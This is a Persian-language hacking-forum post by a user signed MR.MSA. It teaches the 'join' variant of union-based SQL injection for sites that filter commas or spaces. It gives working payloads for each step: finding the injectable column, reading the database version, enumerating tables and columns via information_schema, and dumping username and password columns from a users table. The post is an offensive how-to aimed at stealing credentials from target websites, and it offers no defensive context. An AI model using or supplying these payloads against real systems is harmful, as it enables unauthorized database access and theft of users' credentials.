discord icon
سرور دیسکورد گاردایران

پست های پیشنهاد شده

با سلام خدمت شما کاربران عزیز انجمن گارد ایران 

در این پست می خواهم متد join رو در باگ sql injection  به شما آموزش بدهم . 

------------------------

موارد قابل استفاده

۱- مواجه شدن با خطا زمان استفاده از union select 

۲- مواجه شدن با خطای : 'Unknown column ‘activo’ in ‘field list

۳- زمانی که سایت به عدد حساس است . 

۴- و....

------------------------

نکته :‌ در بیشتر سایت هایی که از متد join استفاده می شود سایت به + و یا به فاصله حساس است و شما به جای فاصله باید از 

/**/

استفاده کنید که من برای راحتی شما عزیزان فایلی را قرار دادم که در متد join به جای فاصله ها از /**/ استفاده شده . 

------------------------

نحوه استفاده از متد join :‌

----------------------------------------

( برای مثال تعداد تیبل های سایت ۵ تا می باشد. )

مرحله اول بیرون کشیدن ستون آسیب پذیر :‌

+union+select+*from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e%23+

و همینطور تا اخر یعنی a و b و c باید کنار ( مقدار  select ) قرار داشته باشند و مثلا ۱ می شود a و ۲ می شود b و به همین صورت و بین هر کدام یک join زمانی که به اخر رسدید دیگه join نمی خواهد و اینکه در اول باید بنویسید :    from *

توجه داشته باشید که هر عدد تبدیل شده است به یک سلکت (مقدار عدد ) ، یک حرف و join

----------------------------------------

( برای مثال در خروجی ستون ۲ را نشان می دهد و ستون ۲  آسیب پذیر است. ) 

مرحله دوم بدست آوردن ورژن

+union+select+*from (select 1)a+join+(select version())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23

 

----------------------------------------

مرحله سوم بیرون کشیدن جدول (table) های دیتابیس (و محدود سازی تیبل ها برای نشان ندادن تیبل های سیستمی ) :

union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+

توجه داشته باشید در بیشتر سایت ها سایت به , حساس است به همین دلیل ما از متد separator برای مرتب سازی تیبل ها و تگ <br> استفاده کردیم

و شما در صورت لزوم می توانید آن بخش هایی که بکگراند سفید دارند را حذف کنید .

----------------------------------------

( برای مثال در بین تیبل ها تیبل msa_users وجود دارد  . ) 

مرحله چهارم بیرون کشیدن ستون های یک تیبل 

union+select+*from+(select 1)a+join+(select+group_concat(column_name)+from+information_schema.columns+where+table_name+like+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+

به جای msa_users نام تیبل مهم خود را بنویسید و می توانید برای مرتب سازی ستون ها از متد separator مانند مرحله سوم استفاده کنید  .

ما از متد like هم استفاده کردیم و اینکه توجه داشته باشید که بیشتر مراحل مثل یونیم بیس هست .

----------------------------------------

( برای مثال در خروجی ستون های user و pass مهم است . ) 

مرحله پنجم بیرون کشیدن اطلاعات در ستون های یک تیبل 

union+select+*from+(select 1)a+join+(select+group_concat(user using ascii)+from+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+

به جای msa_users نام تیبل مهم خود را بنویسید و به جای user نام ستون مهم خود را بنویسید. 

می توانید برای مرتب سازی یوزرنیم ها از متد separator مانند مرحله سوم استفاده کنید.

و اینکه این یک بار برای یوزرنیم بود و برای پسورد به جای user می نویسید pass ( نام ستون مهم که مربوط به pass است )

 

----------------------------------------

 

امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد join یک نکته های مونده که باید بگویم 

برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم منتظر کامنت های شما هستم . 

هر گونه سوال در مورد پست داشتید بپرسید .

 

********* MR.MSA **********

 

 

 

 

Join method in sql injection.txt

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری